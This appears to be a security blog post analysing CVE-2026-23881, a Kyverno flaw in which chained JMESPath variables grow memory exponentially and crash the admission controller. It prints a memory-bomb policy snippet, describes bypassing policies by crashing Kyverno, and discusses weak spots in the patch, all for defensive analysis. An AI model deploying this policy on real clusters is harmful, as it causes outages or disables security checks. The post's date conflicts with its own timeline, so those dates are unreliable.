
The Policy That Ate the Cluster: Deep Dive into CVE-2026-23881

Alon Barad
Software Engineer

Jan 27, 2026

Executive Summary (TL;DR)

Kyverno, the Kubernetes policy engine, failed to cap the memory usage of policy context variables. By chaining JMESPath variable definitions that each reference the previous one, an attacker can turn a few kilobytes of policy YAML into gigabytes of RAM usage. This OOM-kills the Kyverno controller, causing a Denial of Service. If Kyverno is configured to 'Fail-Open', security checks are bypassed. If 'Fail-Closed', the cluster becomes immutable. Patched in 1.15.3 and 1.16.3.

A logic flaw in Kyverno's variable context handling allows for exponential memory amplification (a 'Billion Laughs' style attack), enabling attackers to crash the admission controller and either bypass security policies or deadlock the cluster.

The Hook: Who Watches the Watcher?

Kubernetes is a beast. To tame it, we use admission controllers—bouncers at the API server door that check your ID and dress code before letting you in. Kyverno is one of the most popular bouncers in town. It lets you define policies like "All pods must have resource limits" or "No one runs as root." To make these policies flexible, Kyverno allows for context variables—little scratchpads where you can fetch data (like ConfigMaps) or manipulate strings before making a decision.

But here's the thing about scratchpads: if you don't limit how much someone can write on them, they're going to write until they run out of paper, or in this case, until the server runs out of RAM. CVE-2026-23881 is a classic resource exhaustion bug, but it's not caused by sending a massive payload over the wire. It's caused by sending a tiny payload that Kyverno politely agrees to turn into a massive one.

This is the logical equivalent of asking a bartender for a beer, then asking for another beer for every beer currently on the bar, recursively. Pretty soon, the bar collapses, the bartender is crushed, and nobody gets a drink. In Kubernetes terms: the admission controller crashes, and your cluster is left either undefended or completely locked down.

The Flaw: Exponential Amplification

The vulnerability lies in the pkg/engine/context component of Kyverno. When a policy is evaluated, Kyverno builds a JSON context object. This object holds variables defined in the policy. The engine processes these variables sequentially. Variable A is computed, then Variable B (which can reference A), and so on.

The developers fell into a classic trap: assuming linear resource consumption. They didn't anticipate that a user might define a variable as the concatenation of a previous variable with itself. Using JMESPath functions like join(), an attacker can take a string S and define a new variable V1 as S + S, then V2 as V1 + V1, and so on. This is $O(2^n)$ growth.

Mathematically, it looks like this:

  1. Layer 0: 1KB string.
  2. Layer 1: 2KB (L0 + L0).
  3. Layer 2: 4KB (L1 + L1), and so on, doubling each layer.
  4. Layer 18: ~256MB.
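
To make this concrete, here is a tiny, self-contained Go sketch (not Kyverno's engine; the map-of-strings context is a stand-in for illustration) that evaluates a doubling chain the same way: sequentially, with each layer referencing the one before it, and with nothing tracking the cumulative size.

// Minimal sketch: a context evaluated sequentially, where each layer
// references the previous one and nothing tracks the cumulative size.
// Warning: running this allocates roughly 0.5GB of heap. That is the point.
package main

import (
    "fmt"
    "strings"
)

func main() {
    ctx := map[string]string{"l0": strings.Repeat("A", 1024)} // Layer 0: 1KB seed

    for i := 1; i <= 18; i++ {
        prev := ctx[fmt.Sprintf("l%d", i-1)]
        name := fmt.Sprintf("l%d", i)
        ctx[name] = prev + prev // equivalent of jmesPath: join('', [prev, prev])
        fmt.Printf("%s: %d KB\n", name, len(ctx[name])/1024)
    }
}

Eighteen iterations later, l18 alone is ~256MB, and the context as a whole holds roughly twice that, all from a seed of one kilobyte.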

Kyverno had no global tracker for the total size of this context. It would happily allocate Go objects for each step until the process hit the container's memory limit (OOM). Because this happens during admission review, it blocks the API server's request until the timeout fires or the pod dies. It is effectively the "Billion Laughs" XML bomb attack, reincarnated in modern cloud-native YAML.

The Code: The Smoking Gun

Let's look at why this happened. In the vulnerable versions, the context handling was essentially a free-for-all map assignment. There was no cumulative accounting.

Here is the logic pre-patch (simplified for clarity):

// Vulnerable Logic
func (c *Context) AddContextEntry(name string, data interface{}) {
    // Just throw it in the map. Memory is free, right?
    c.jsonContext[name] = data
}

The fix, introduced in commit 7a651be3a8c78dcabfbf4178b8d89026bf3b850f, adds a maxContextSize budget. Now, every time you try to add a variable, the engine checks if you can afford it.

// Patched Logic
func (c *Context) AddContextEntry(name string, data interface{}) error {
    // calculate size of new data
    size := getSize(data)
    
    // check budget
    if c.currentSize + size > c.maxContextSize {
        return fmt.Errorf("context size limit exceeded: %d > %d", 
            c.currentSize + size, c.maxContextSize)
    }
    
    c.currentSize += size
    c.jsonContext[name] = data
    return nil
}
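
A quick way to convince yourself the budget works is to run the doubling chain through the same kind of cumulative check. This is a self-contained sketch with invented names (budgetContext is not Kyverno's real type), not the actual patched code:

// Minimal sketch: a cumulative size budget stops the doubling chain early.
package main

import (
    "fmt"
    "strings"
)

type budgetContext struct {
    entries     map[string]string
    currentSize int
    maxSize     int
}

func (c *budgetContext) add(name, data string) error {
    if c.currentSize+len(data) > c.maxSize {
        return fmt.Errorf("context size limit exceeded: %d > %d", c.currentSize+len(data), c.maxSize)
    }
    c.currentSize += len(data)
    c.entries[name] = data
    return nil
}

func main() {
    ctx := &budgetContext{entries: map[string]string{}, maxSize: 2 << 20} // 2MiB budget
    layer := strings.Repeat("A", 1024)                                    // 1KB seed

    for i := 0; ; i++ {
        if err := ctx.add(fmt.Sprintf("l%d", i), layer); err != nil {
            fmt.Printf("l%d rejected: %v\n", i, err)
            return
        }
        layer += layer // the join('', [prev, prev]) doubling
    }
}

With a 2MiB budget the chain is cut off around the eleventh layer, long before anything approaches the gigabyte range.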

> [!NOTE]
> The fix isn't perfect. Calculating the size of a Go interface{} is tricky. The patch often estimates size based on the raw JSON bytes, but the in-memory representation of a map in Go is significantly larger (pointers, headers, allocator overhead). A 2MB limit might still result in 10-20MB of actual heap usage, but it effectively stops the exponential growth.
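
That gap is easy to measure. The following standalone sketch (plain Go, nothing Kyverno-specific) builds roughly 1MB of JSON out of many tiny objects, unmarshals it into map[string]interface{}, and compares the raw byte count with the approximate heap growth:

// Minimal sketch: raw JSON bytes vs. heap used by the decoded representation.
package main

import (
    "encoding/json"
    "fmt"
    "runtime"
    "strings"
)

func heapAlloc() uint64 {
    runtime.GC()
    var m runtime.MemStats
    runtime.ReadMemStats(&m)
    return m.HeapAlloc
}

func main() {
    // ~1MB of JSON made of many tiny nested objects.
    var b strings.Builder
    b.WriteString("{")
    for i := 0; i < 50000; i++ {
        if i > 0 {
            b.WriteString(",")
        }
        fmt.Fprintf(&b, `"k%d":{"v":"x"}`, i)
    }
    b.WriteString("}")
    raw := []byte(b.String())

    before := heapAlloc()
    var decoded map[string]interface{}
    if err := json.Unmarshal(raw, &decoded); err != nil {
        panic(err)
    }
    after := heapAlloc()

    fmt.Printf("raw JSON: %d bytes\n", len(raw))
    fmt.Printf("approx heap growth after unmarshal: %d bytes\n", after-before)
    runtime.KeepAlive(decoded) // keep the decoded map live for the measurement
}

On a typical run the decoded structure occupies several times the raw byte count, which is exactly the overhead the note describes.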

The Exploit: Building the Memory Bomb

Exploiting this requires permission to create a Policy or ClusterPolicy. This is usually restricted to admins, but in multi-tenant clusters or GitOps workflows, a developer might have rights to push policies to their namespace.

We don't need fancy C2 servers. We just need a recursive JMESPath loop. Here is the attack chain:

  1. Seed: Create a random string of 1KB.
  2. Amplify: Create 18 layers of variables, each joining the previous layer to itself.
  3. Trigger: Send a request that matches the policy (e.g., creating a ConfigMap).

The context section of the malicious policy looks like this:

context:
  - name: l0
    variable:
      jmesPath: random('[a-zA-Z0-9]{1000}') # 1KB
  - name: l1
    variable:
      jmesPath: join('', [l0, l0]) # 2KB
  # ... repeat ...
  - name: l18
    variable:
      jmesPath: join('', [l17, l17]) # 256MB

When the admission controller processes the l18 variable, it tries to allocate a contiguous 256MB string. If that passes, an l19 would need 512MB. The Go runtime can no longer satisfy allocations within the container's memory limit, the kernel invokes the OOM Killer, and the pod dies instantly.

The Impact: Fail Open or Fail Closed?

Why is this rated High severity and not Critical? Because it requires policy-creation rights. However, the impact of a successful exploit is devastating for cluster stability.

Scenario A: failurePolicy: Ignore (The Default)

If Kyverno is configured to ignore failures when it times out or crashes, the Admission Controller effectively vanishes. The bouncer is dead, and the door is wide open. An attacker can crash Kyverno and immediately deploy a privileged pod that mounts the host filesystem, which would normally be blocked by policy.

Scenario B: failurePolicy: Fail (The Secure Choice)

If you configured Kyverno to be secure by default, crashing the controller creates a massive denial of service. Since the webhook fails, the API server rejects all requests that require validation. No new pods, no deployments, no config changes. The cluster is essentially read-only until Kyverno recovers (which it won't, if the malicious policy persists).

Furthermore, the Reports Controller loads the same policies for background compliance scans. It will crash as well, blinding the security team to the state of the cluster.

The Fix: Mitigation & Bypass Research

The remediation is straightforward: Upgrade to Kyverno 1.15.3 or 1.16.3. These versions introduce a hard cap on context size (default 2MiB).

However, for the paranoid security researchers among us, the patch analysis reveals some interesting edge cases:

  1. Monotonic Growth: The ReplaceContextEntry function increments the size tracker but doesn't decrement it when replacing an entry. This means a long-running policy evaluation that updates variables often could hit the limit artificially. This is a potential (though minor) DoS of legitimate policies; a minimal sketch of the quirk follows after this list.
  2. Unmarshaling Overhead: The limit is on the raw bytes. Go's JSON unmarshaler is memory-hungry. An attacker could craft a context that fits the 2MB limit but is structurally complex (deeply nested maps), causing the unmarshaler to allocate far more heap memory than the size tracker accounts for.
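
Here is a compact sketch of that first quirk (invented names again, not Kyverno's actual types). The tracker only ever grows, so repeatedly replacing the same small variable eventually trips the limit even though the real context never does:

// Minimal sketch: a size tracker that never decrements on replacement.
package main

import "fmt"

type trackedContext struct {
    entries     map[string]string
    currentSize int
    maxSize     int
}

func (c *trackedContext) replace(name, data string) error {
    if c.currentSize+len(data) > c.maxSize {
        return fmt.Errorf("context size limit exceeded")
    }
    // The size of the entry being overwritten is never subtracted.
    c.currentSize += len(data)
    c.entries[name] = data
    return nil
}

func main() {
    ctx := &trackedContext{entries: map[string]string{}, maxSize: 10 * 1024}
    payload := string(make([]byte, 1024)) // 1KB value, replaced over and over

    for i := 0; ; i++ {
        if err := ctx.replace("same-variable", payload); err != nil {
            fmt.Printf("replacement %d rejected; tracked size %d, real size %d\n",
                i, ctx.currentSize, len(ctx.entries["same-variable"]))
            return
        }
    }
}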

Immediate Mitigation: If you cannot upgrade right away, use RBAC to strictly control who can create Policy and ClusterPolicy objects. Audit all existing policies for usage of repeat(), join(), or chained variable definitions that reference earlier variables.
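
As a starting point for that audit, here is a rough helper sketch, not an official Kyverno tool. It assumes a reachable cluster and a kubeconfig at the default location, lists ClusterPolicies through the Kubernetes dynamic client, and naively greps each serialized policy for join( or repeat(:

// Rough audit sketch: flag ClusterPolicies whose spec mentions join( or repeat(.
package main

import (
    "context"
    "fmt"
    "strings"

    metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
    "k8s.io/apimachinery/pkg/runtime/schema"
    "k8s.io/client-go/dynamic"
    "k8s.io/client-go/tools/clientcmd"
)

func main() {
    // Assumes a kubeconfig at the default path (~/.kube/config).
    cfg, err := clientcmd.BuildConfigFromFlags("", clientcmd.RecommendedHomeFile)
    if err != nil {
        panic(err)
    }
    client, err := dynamic.NewForConfig(cfg)
    if err != nil {
        panic(err)
    }

    gvr := schema.GroupVersionResource{Group: "kyverno.io", Version: "v1", Resource: "clusterpolicies"}
    list, err := client.Resource(gvr).List(context.TODO(), metav1.ListOptions{})
    if err != nil {
        panic(err)
    }

    for _, pol := range list.Items {
        // Crude heuristic: any mention of join( or repeat( anywhere in the object.
        dump := fmt.Sprintf("%v", pol.Object)
        if strings.Contains(dump, "join(") || strings.Contains(dump, "repeat(") {
            fmt.Printf("review policy %q: context uses join()/repeat()\n", pol.GetName())
        }
    }
}

It is deliberately crude: a match only means the policy deserves a manual look, not that it is malicious.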


Technical Appendix

CVSS Score: 7.7 / 10
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H
EPSS Probability: 0.20%

Affected Systems

Kyverno Admission Controller
Kyverno Reports Controller
Kubernetes Clusters using Kyverno

Affected Versions Detail

Kyverno: affected < 1.15.3, fixed in 1.15.3
Kyverno: affected >= 1.16.0, < 1.16.3, fixed in 1.16.3

CWE: CWE-770 (Resource Allocation without Limits)
Attack Vector: Network (via Kubernetes API)
CVSS v3.1: 7.7 (High)
Impact: Denial of Service / Security Bypass
Exploit Complexity: Low (Requires Policy Creation Rights)
Component: pkg/engine/context
CWE-770
Allocation of Resources Without Limits or Throttling

Vulnerability Timeline

Vulnerability Discovered: 2026-02-10
Initial Fix Committed: 2026-02-15
Patched Versions Released: 2026-02-20
